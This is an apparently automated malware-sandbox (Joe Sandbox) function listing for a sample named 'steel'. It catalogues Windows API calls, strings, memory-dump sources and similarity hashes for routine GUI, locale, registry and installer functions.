                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                              • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                            • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                              • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                              • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                            • String ID: ,$?
                                                                                            • API String ID: 2359071979-2308483597
                                                                                            • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                            • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                            APIs
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                            • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                            • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                            • String ID:
                                                                                            • API String ID: 1030595962-0
                                                                                            • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                            • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                            APIs
                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                            • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                            • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                            • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                            • String ID:
                                                                                            • API String ID: 2222416421-0
                                                                                            • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                            • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                            • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                              • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                              • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                              • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                              • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                            • TranslateMessage.USER32(?), ref: 004573B3
                                                                                            • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                            • String ID: [Paused]
                                                                                            • API String ID: 1007367021-4230553315
                                                                                            • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                            • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                            • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                            APIs
                                                                                            • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LoadSleep
                                                                                            • String ID: CheckPassword
                                                                                            • API String ID: 4023313301-1302249611
                                                                                            • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                            • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                            • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                            APIs
                                                                                              • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                              • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                              • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                            • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                            • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                            Strings
                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                            • API String ID: 613034392-3771334282
                                                                                            • Opcode ID: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction ID: 262cbc5b9954910938d5a1e8e32dc50db46ad6f301169d9d39307b56b522dac3
                                                                                            • Opcode Fuzzy Hash: a349fc6668a2a279a7709dc0d92d626649643492524c5ed72309cd5f58a9f2ee
                                                                                            • Instruction Fuzzy Hash: 87318474B042159EDB10EBB9C8867EE76A0AF08714F90807AB548EB392D67C9D4187AD
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
                                                                                            Strings
                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
                                                                                            • CreateAssemblyCache, xrefs: 00459836
                                                                                            • Fusion.dll, xrefs: 004597DF
                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00459824
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                            • API String ID: 190572456-3990135632
                                                                                            • Opcode ID: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction ID: 9a538673283cb431493768ab67eac729fe35d93f11f945e2dcd414e2b3f175b6
                                                                                            • Opcode Fuzzy Hash: 64b7f7115ec2050a4f0e42ab113808549d669c8acfba7d9bf3bad921683fe547
                                                                                            • Instruction Fuzzy Hash: A2318B70E10649ABCB10FFA5C88169EB7B8EF45315F50857BE814E7382DB389E08C799
                                                                                            APIs
                                                                                              • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
                                                                                            • GetFocus.USER32 ref: 0041C168
                                                                                            • GetDC.USER32(?), ref: 0041C174
                                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 0041C195
                                                                                            • RealizePalette.GDI32(?), ref: 0041C1A1
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
                                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
                                                                                            • ReleaseDC.USER32(?,?), ref: 0041C1ED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitsFocusObjectRealizeRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3303097818-0
                                                                                            • Opcode ID: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction ID: 25a0b6576c779426e59073023ceed4ef49f3845c1b310514cd4f08ef327de147
                                                                                            • Opcode Fuzzy Hash: 26117fda3ddcda01a6cc84f42a4f6ec069d0e010bd6cdd98afb854c6c7779a8d
                                                                                            • Instruction Fuzzy Hash: 49116D71A44604BFDF10DBE9CC81FAFB7FCEB48700F50486AB518E7281DA7899008B28
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C70
                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C78
                                                                                            • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
                                                                                              • Part of subcall function 004107F8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
                                                                                            • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
                                                                                            • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
                                                                                            • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
                                                                                            • 6F530860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$C400C740F530860F532980
                                                                                            • String ID:
                                                                                            • API String ID: 209721339-0
                                                                                            • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                            • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                            • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                            • API String ID: 47109696-2530820420
                                                                                            • Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
                                                                                            • Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
                                                                                            • Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
                                                                                            APIs
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 1458357782-0
                                                                                            • Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
                                                                                            • Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
                                                                                            • Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00495519
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049553B
                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00495571
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0049558E
                                                                                            Strings
                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 2948443157-222967699
                                                                                            • Opcode ID: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
                                                                                            • Opcode Fuzzy Hash: 15e89f7ca813e7522845c960856b2cdc022ede195b48aa860a28df6e22a0f939
                                                                                            • Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 004233AF
                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233BC
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233D1
                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
                                                                                            • SetCursor.USER32(00000000), ref: 00423413
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1770779139-0
